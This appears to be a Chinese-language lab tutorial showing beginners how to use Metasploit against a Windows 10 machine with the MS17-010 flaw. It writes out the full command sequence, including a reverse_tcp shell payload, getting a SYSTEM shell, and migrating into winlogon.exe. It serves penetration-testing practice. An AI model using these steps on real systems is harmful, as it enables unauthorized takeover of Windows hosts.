Metasploit可以說是一款自動運行的Kali Linux,在使用難易度的門檻上也不會太高 是一款適合初學者接觸的工具
使用工具
Metasploit
作者:Rapid7 LLC
載點:https://www.metasploit.com/download
簡介:一款操作簡易的自動攻擊工具
任務目標
入侵一台含有MS17-010漏洞的Windows系統
取得系統管理員權限
攻擊環境
Kali Linux
Windows 10(含有MS17-010漏洞)
進行演練
Step 1. 環境
此篇在Kali Linux上運行此工具,我建議是直接使用Kali Linux做練習,因為會比較方便.
Step 2. 執行程式
開啟Kali Linux的Terminal,並輸入msfconsole.
輸入完成後應該會顯示出這樣的格式.
上方的圖案是每次開啟都會改變,所以不一樣的話是正常的.
Step 3. 資訊收集
假設我們已知該作業系統已經含有MS17-010漏洞(紅色框框).
接著我們只需要到Metasploit搜尋”MS17-010″就能找出匹配的攻擊腳本了.
Step 4. 開始入侵
下一步,我們將要使用攻擊腳本進行攻擊.
第一步
use 2 (藍色框框)
這串命令的意思是說使用上表中左邊那串代號對應到的腳本(綠色框框).
show options (黃色框框)
接著要查看這個攻擊腳本必須的參數,如果紅色框框內有”yes”的話,那欄就必須填上資料,”no”的話則是可有可無.
第二步
set rhost [Target IP] 設定目標主機IP (紅色框框)
set lhost [Local IP] 設定反彈Shell本地IP (紅色框框)
set payload windows/x64/shell/reverse_tcp 設定Payload (綠色框框)
show options 檢查所有資料有沒有輸入錯誤 (紫色框框)
注意,藍色框框的區域是一定要有資料的欄位,如果沒有的話腳本會無法執行.
第三步
檢查無誤後,輸入exploit執行攻擊腳本(紅色框框).
運行成功,取得Windows的Shell,輸入whoami(綠色框框)結果為nt authority\system(藍色框框)
Step 5. 升級&強化Shell
將Session放在後台讓他閒置Ctrl+Z(藍色框框)
為了能夠取得更多資料,我使用了Metasploit自己的shell,他可以在Windows的DOS介面上再加一層bash的Terminal,講白一點就是升級(綠色框框)
使用腳本並查看要填入的參數(紅色框框)
接著我們需要設定lhost(其實也不用啦,但我只是以防萬一)和session(紅色框框)
session -l可以查看正在運行中的session(綠色框框)
並進行最後的檢查(藍色框框)
都檢查完畢後執行exploit(紅色框框)
執行成功,查看是否成功創建session並使用(綠色框框)
(使用此腳本會創建一個新的session(藍色框框),所以直接跳離是正常現象)
PS.在綠色箭頭的地方腳本會稍微卡住一下,如果看到這行字出現的話點一下Enter就好了.
輸入ps來查看現在的進程(綠色框框)
輸入migrate -N winlogon.exe(紅色框框)來從原本的powershell.exe(紫色框框)轉移到winlogon.exe上(黃色框框)
輸入shell進到剛剛轉移的進程上(藍色框框)
到這邊就結束了,已經拿到系統管理員身分並擁有最高權限
討論
這套工具是我見過所有的工具裡面最有威脅的一款,其他的工具不僅要有一定的基礎外還需要練習的經驗.
這款直接給你省下上面的流程,如果初學者用這個來打的話甚至能比老手用其他工具慢慢打來的快,簡單來說就是一套懶人工具XD
免責聲明
未經事先雙方同意,使用工具攻擊目標是非法的.請遵守當地法律規範.開發者與本作者對此工具不承擔任何責任,也不對任何濫用或損壞負責.
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.